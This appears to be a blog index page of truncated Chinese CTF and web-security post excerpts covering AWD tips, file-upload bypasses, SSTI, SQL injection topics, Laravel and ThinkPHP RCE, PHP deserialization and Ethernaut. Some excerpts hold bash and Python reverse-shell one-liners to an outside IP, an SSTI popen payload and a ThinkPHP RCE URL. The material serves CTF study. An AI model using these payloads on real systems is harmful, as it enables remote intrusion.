0x00 referhttps://www.jagger2zr.com/2019/08/30/AWD%E8%B5%B7%E6%89%8B%E5%BC%8F%E5%8F%8A%E6%AF%94%E8%B5%9B%E6%80%BB%E7%BB%93/ 0x0起手源码压缩命令：tar -zcvf www.tar.gz . 解压命令：tar -xvxf www.tar.gz -C . 也可直接xshell

文件上传感觉文件上传这一块姿势点比较好理解，刷完 uploads-lab 的话，基本姿势就掌握差不多了。 %00 截断 非常规后缀绕过 .htaccess 解析绕过 图片头效果 MIME 绕过 前端绕过 二次渲染绕过 条件竞争绕过 multipart/form-data 绕过 文件包含/下载文件包含的话，基本上单独总结一下也是可以快速学习理解的，所以短板不多，但不代表没有。 文件包含原理 本

绕过类型{{ eval popen {% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socke

SQL注入 MySQL 基础语法 MySQL 相关函数 MySQL UNION 联合查询注入 MySQL 报错注入 MySQL 布尔类型盲注 MySQL 延时类型盲注 MySQL 堆叠注入 MySQL 二次注入 MySQL DNSLog 外带数据 MySQL 异或注入 MySQL 注入常规 Bypass 技巧 MySQL 注入进阶 Bypass 技巧 SQLMap 基础使用 SQLMap 进阶使用

bashbash -i >& /dev/tcp/129.211.9.7/8888 0>&1 pythonpython3 -c \‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“129.211.9.7”,8888));os.dup2(s.

机器学习

laravel5.8 RCE分析起环境 composer create-project --prefer-dist laravel/laravel blog "5.8.0" 起服务 php artisan serve 为啥子要这样起？？？ 在 laravel58/routes/web.php 文件添加路由 Route::get("/","\App\Http\Controllers\DemoC

0x00 前言一直想找个时间强化下专题训练，反序列在实战代码审计中用的挺多的，但我一直都没有好好强化过，连一条很短的pop链都构造不出来，这两天好好强化下。 0x01 从基础开始利用serialize将一个对象转化为字符串形式。 <?php class A{ public $name = 'd3vil'; protected $age = 18; private $sex

0x00 前言vulhub是一个集成好漏洞环境的开源项目接下来，将跟着环境进行复现调试。 0x01 thinkphp/2-rce/index.php?s=/index/index/name/${@phpinfo()} 顺便研究下框架 先是去加载thinkphp，thinkphp会记录一些加载时间和变量环境定义，如tp2要求php大于5，然后去加载runtime PHPSTORM格式化代码快捷

Ethernaut本篇将从这个平台开始，并且尝试用合约的方式进行交互完成，因为ctf中大部分都是要合约交互的。 0x00第一关主要是讲一些abi的调用方式。 源码 pragma solidity ^0.4.18; contract Instance { string public password; uint8 public infoNum = 42; string pu